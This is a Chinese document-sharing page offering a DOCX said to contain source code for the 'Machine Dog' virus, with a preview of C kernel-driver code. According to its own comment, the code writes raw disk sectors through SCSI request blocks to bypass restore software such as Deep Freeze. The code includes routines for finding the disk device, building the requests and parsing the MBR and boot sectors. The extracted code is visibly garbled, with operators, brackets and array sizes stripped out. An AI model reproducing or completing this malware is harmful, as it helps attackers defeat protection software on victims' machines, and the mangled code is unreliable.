ImageVerifierCode 换一换
格式:DOCX , 页数:17 ,大小:19.88KB ,
资源ID:4276755      下载积分:3 金币
快捷下载
登录下载
邮箱/手机:
温馨提示:
快捷下载时,用户名和密码都是您填写的邮箱或者手机号,方便查询和重复下载(系统自动生成)。 如填写123,账号就是123,密码也是123。
特别说明:
请自助下载,系统不会自动发送文件的哦; 如果您已付费,想二次下载,请登录后访问:我的下载记录
支付方式: 支付宝    微信支付   
验证码:   换一换

加入VIP,免费下载
 

温馨提示:由于个人手机设置不同,如果发现不能下载,请复制以下地址【https://www.bdocx.com/down/4276755.html】到电脑端继续下载(重复下载不扣费)。

已注册用户请登录:
账号:
密码:
验证码:   换一换
  忘记密码?
三方登录: 微信登录   QQ登录  

下载须知

1: 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。
2: 试题试卷类文档,如果标题没有明确说明有答案则都视为没有答案,请知晓。
3: 文件的所有权益归上传用户所有。
4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
5. 本站仅提供交流平台,并不能对任何下载内容负责。
6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

版权提示 | 免责声明

本文(机器狗病毒源码1C语言.docx)为本站会员(b****5)主动上传,冰豆网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知冰豆网(发送邮件至service@bdocx.com或直接QQ联系客服),我们立即给予删除!

机器狗病毒源码1C语言.docx

1、机器狗病毒源码1C语言/备注:获取文件在扇区的位置后,向磁盘驱动发送srb命令读写扇区,来穿透冰点等还原软件。/编译时注意:FileSystemControl的数据结构需要自己添加。#include#include#define FSCTL_GET_RETRIEVAL_POINTERS 0x90073#define PARTITION_TYPE_NTFS 0x07#define PARTITION_TYPE_FAT32 0x0B#define PARTITION_TYPE_FAT32_LBA 0x0Cextern POBJECT_TYPE* IoDriverObjectType;LARGE_I

2、NTEGER realdiskpos;ULONG sectorspercluster;typedef struct RETRIEVAL_POINTERS_BUFFER ULONG ExtentCount; LARGE_INTEGER StartingVcn; struct LARGE_INTEGER NextVcn; LARGE_INTEGER Lcn; Extents1; RETRIEVAL_POINTERS_BUFFER, *PRETRIEVAL_POINTERS_BUFFER;typedef struct LARGE_INTEGER StartingVcn; STARTING_VCN_I

3、NPUT_BUFFER, *PSTARTING_VCN_INPUT_BUFFER;typedef struct _SENSE_DATA unsigned char Valid; unsigned char SegmentNumber; unsigned char FileMark; unsigned char Information4; unsigned char AdditionalSenseLength; unsigned char CommandSpecificInformation4; unsigned char AdditionalSenseCode; unsigned char A

4、dditionalSenseCodeQualifier; unsigned char FieldReplaceableUnitCode; unsigned char SenseKeySpecific3; SENSE_DATA, *PSENSE_DATA;#pragma pack(1)typedef struct _PARTITION_ENTRY UCHAR active; UCHAR StartHead; UCHAR StartSector; UCHAR StartCylinder; UCHAR PartitionType; UCHAR EndHead; UCHAR EndSector; UC

5、HAR EndCylinder; ULONG StartLBA; ULONG TotalSector; PARTITION_ENTRY, *PPARTITION_ENTRY;typedef struct _MBR_SECTOR UCHAR BootCode446; PARTITION_ENTRY Partition4; USHORT Signature; MBR_SECTOR, *PMBR_SECTOR;typedef struct _BBR_SECTOR USHORT JmpCode; UCHAR NopCode; UCHAR OEMName8; USHORT BytesPerSector;

6、 UCHAR SectorsPerCluster; USHORT ReservedSectors; UCHAR NumberOfFATs; USHORT RootEntries; USHORT NumberOfSectors16; UCHAR MediaDescriptor; USHORT SectorsPerFAT16; USHORT SectorsPerTrack; USHORT HeadsPerCylinder; ULONG HiddenSectors; ULONG NumberOfSectors32; ULONG SectorsPerFAT32; BBR_SECTOR, *PBBR_S

7、ECTOR;#pragma pack()typedef struct _SYSTEM_MODULE_INFORMATION ULONG Reserved2;PVOID Base;ULONG Size;ULONG Flags;USHORT Index;USHORT Unknown;USHORT LoadCount;USHORT ModuleNameOffset; CHAR ImageName255; SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;NTSYSAPINTSTATUSNTAPIObReferenceObjectByName

8、(IN PUNICODE_STRING ObjectName,IN ULONG Attributes,IN PACCESS_STATE AccessState OPTIONAL,IN ACCESS_MASK DesiredAccess OPTIONAL,IN POBJECT_TYPE ObjectType,IN KPROCESSOR_MODE AccessMode,IN OUT PVOID ParseContext OPTIONAL,OUT PVOID* Object );NTSYSAPINTSTATUSNTAPIZwQuerySystemInformation( IN ULONG Syste

9、mInformationClass, IN OUT PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength);NTSTATUS IrpCompletionRoutine( IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp, IN PVOID Context ) PMDL mdl; Irp-UserIosb-Status=Irp-IoStatus.Status; Irp-UserIosb-Information=Irp-IoStatus.Inform

10、ation; if(! Context) mdl=Irp-MdlAddress; if(mdl) DbgPrint(read size: %d., Irp-IoStatus.Information); MmUnlockPages(mdl); IoFreeMdl(mdl); KeSetEvent(Irp-UserEvent, IO_NO_INCREMENT, 0); IoFreeIrp(Irp);return STATUS_MORE_PROCESSING_REQUIRED;NTSTATUS IrpCompletionRoutine_0( IN PDEVICE_OBJECT DeviceObjec

11、t, IN PIRP Irp, IN PVOID Context ) PMDL mdl; Irp-UserIosb-Status=Irp-IoStatus.Status; Irp-UserIosb-Information=Irp-IoStatus.Information; if (! Context ) mdl=Irp-MdlAddress; if ( mdl ) DbgPrint(read size: %d., Irp-IoStatus.Information); MmUnlockPages(mdl); IoFreeMdl(mdl); KeSetEvent(Irp-UserEvent, IO

12、_NO_INCREMENT, 0); IoFreeIrp(Irp); return STATUS_MORE_PROCESSING_REQUIRED;ULONG GetModuleBase(char* name) ULONG n,i ; PSYSTEM_MODULE_INFORMATION module; PVOID pbuftmp; char modulename255; ZwQuerySystemInformation(11, &n, 0, &n); pbuftmp = ExAllocatePool(NonPagedPool, n); ZwQuerySystemInformation(11,

13、 pbuftmp, n, NULL);module = (PSYSTEM_MODULE_INFORMATION)(PULONG )pbuftmp + 1 );n = *(PULONG)pbuftmp ); for ( i = 0; i CurrentLocation; stack = IoGetNextIrpStackLocation( Irp ); Irp-Tail.Overlay.CurrentStackLocation= stack;/移动堆栈 stack-DeviceObject=DeviceObject; return (DeviceObject-DriverObject-Major

14、Function(ULONG)stack-MajorFunction)(DeviceObject, Irp);ULONG AtapiReadWriteDisk(PDEVICE_OBJECT dev_object,ULONG MajorFunction, PVOID buffer,ULONG DiskPos, int BlockCount) NTSTATUS status; PSCSI_REQUEST_BLOCK srb; PSENSE_DATA sense; KEVENT Event; PIRP irp; PMDL mdl; IO_STATUS_BLOCK isb; PIO_STACK_LOC

15、ATION isl; PVOID psense; int count=8; while(1) srb=ExAllocatePool(0,sizeof(SCSI_REQUEST_BLOCK); if(!srb) break; sense=ExAllocatePool(0,sizeof(SENSE_DATA); psense=sense; if(!sense) break; memset(srb,0,sizeof(SCSI_REQUEST_BLOCK); memset(sense,0,sizeof(SENSE_DATA); srb-Length=sizeof(SCSI_REQUEST_BLOCK)

16、;/更多关于srb,请看SCSI 总线和IDE接口:协议、应用和编程和SCSI程序员指南 srb-Function=0; srb-DataBuffer=buffer; srb-DataTransferLength=BlockCountQueueAction=SRB_FLAGS_DISABLE_AUTOSENSE; srb-SrbStatus=0; srb-ScsiStatus=0; srb-NextSrb=0; srb-SenseInfoBuffer=sense; srb-SenseInfoBufferLength=sizeof(SENSE_DATA); if(MajorFunction=IR

17、P_MJ_READ) srb-SrbFlags=SRB_FLAGS_DATA_IN; else srb-SrbFlags=SRB_FLAGS_DATA_OUT; if(MajorFunction=IRP_MJ_READ) srb-SrbFlags|=SRB_FLAGS_ADAPTER_CACHE_ENABLE; srb-SrbFlags|=SRB_FLAGS_DISABLE_AUTOSENSE; srb-TimeOutValue=(srb-DataTransferLength10)+1; srb-QueueSortKey=DiskPos; srb-CdbLength=10; srb-Cdb0=

18、2*(UCHAR)MajorFunction+ 17); srb-Cdb1=srb-Cdb1 & 0x1F | 0x80; srb-Cdb2=(unsigned char)(DiskPos0x18)&0xFF; / srb-Cdb3=(unsigned char)(DiskPos0x10)&0xFF; / srb-Cdb4=(unsigned char)(DiskPos0x08)&0xFF; / srb-Cdb5=(UCHAR)DiskPos; /填写sector位置 srb-Cdb7=(UCHAR)BlockCount0x08; srb-Cdb8=(UCHAR)BlockCount; /By

19、:Eros412 KeInitializeEvent(&Event, 0, 0); irp=IoAllocateIrp(dev_object-StackSize,0); mdl=IoAllocateMdl(buffer, BlockCountMdlAddress=mdl; if(!mdl) ExFreePool(srb); ExFreePool(psense); IoFreeIrp(irp); return STATUS_INSUFFICIENT_RESOURCES; MmProbeAndLockPages(mdl,0,(MajorFunction=IRP_MJ_READ?0:1); srb-

20、OriginalRequest=irp; irp-UserIosb=&isb; irp-UserEvent=&Event; irp-IoStatus.Status=0; irp-IoStatus.Information=0; irp-Flags=IRP_SYNCHRONOUS_API|IRP_NOCACHE; irp-AssociatedIrp.SystemBuffer=0; irp-Cancel=0; irp-RequestorMode=0; irp-CancelRoutine=0; irp-Tail.Overlay.Thread=PsGetCurrentThread(); isl=IoGe

21、tNextIrpStackLocation(irp); isl-DeviceObject=dev_object; isl-MajorFunction=IRP_MJ_SCSI; isl-Parameters.Scsi.Srb=srb; isl-CompletionRoutine=IrpCompletionRoutine_0; isl-Context=srb; isl-Control=SL_INVOKE_ON_CANCEL|SL_INVOKE_ON_SUCCESS|SL_INVOKE_ON_ERROR; status=MyIoCallDriver(dev_object,irp); KeWaitFo

22、rSingleObject(&Event, 0, 0, 0, 0); if(srb-SenseInfoBuffer!=psense&srb-SenseInfoBuffer) ExFreePool(srb-SenseInfoBuffer); ExFreePool(srb); ExFreePool(psense); if ( status = 0 | !count ) return status; DbgPrint(Send XXX Failed.%08xrn, status); KeStallExecutionProcessor(1u); -count; return STATUS_INSUFF

23、ICIENT_RESOURCES;PDEVICE_OBJECT GetLastDiskDeviceObject(PDRIVER_OBJECT drv_object)/这个就是DR0 PDEVICE_OBJECT result; PDEVICE_OBJECT finddev; finddev=drv_object-DeviceObject; result=NULL; while (finddev) if (finddev-DeviceType=FILE_DEVICE_DISK) result = finddev; finddev=finddev-NextDevice; return result

24、;PDEVICE_OBJECT GetAtaDr0DevObject()UNICODE_STRING diskstr;PDRIVER_OBJECT diskdrv;PDEVICE_OBJECT dr0dev; RtlInitUnicodeString(&diskstr, LDriverDisk); if(ObReferenceObjectByName(&diskstr,64,0,0,*IoDriverObjectType,0,0,&diskdrv)Vpb; result=vpb-DeviceObject; if(!vpb|!result) if(!Object-DeviceObject-Vpb

25、|!Object-DeviceObject-Vpb-DeviceObject) result=Object-DeviceObject; return result;PLARGE_INTEGER GetPosAndCluster()/得到第一个分区文件数据的起始位置 PVOID buffer; ULONG type,startlba; int i; PLARGE_INTEGER result; PDEVICE_OBJECT dev; PMBR_SECTOR mbrsec; PPARTITION_ENTRY partition0; PBBR_SECTOR bootsec; result=ExAll

26、ocatePool(0,sizeof(LARGE_INTEGER); dev=GetAtaDr0DevObject(); if(dev) buffer=ExAllocatePool(0,512); memset(buffer,0,512); if(AtapiReadWriteDisk(dev, IRP_MJ_READ, buffer, 0, 1)0) DbgPrint(AtapiReadWriteDisk ok); mbrsec=(PMBR_SECTOR)buffer; partition0=&mbrsec-Partition0; startlba=partition00.StartLBA;

27、type=partition00.PartitionType; DbgPrint(dwPartOnePos:0x%08x.1, startlba); result-QuadPart=startlba; memset(buffer,0,512); if(AtapiReadWriteDisk(dev, IRP_MJ_READ, buffer, startlba, 1)0) bootsec=(PBBR_SECTOR)buffer; DbgPrint(gSectorsPerCluster:%d., bootsec-SectorsPerCluster); sectorspercluster=bootsec-SectorsPerCluster; result-QuadPart+=bootsec-ReservedSectors; DbgPrint(dwPartOnePos:%I64x.2rn, result-QuadPart); if(type=PARTITION_TYPE_FAT32|type=PARTITION_TYPE_FAT32_LBA) result-QuadPart+=bootsec-NumberOfFATs*bootsec-SectorsPerFA

copyright@ 2008-2022 冰豆网网站版权所有

经营许可证编号:鄂ICP备2022015515号-1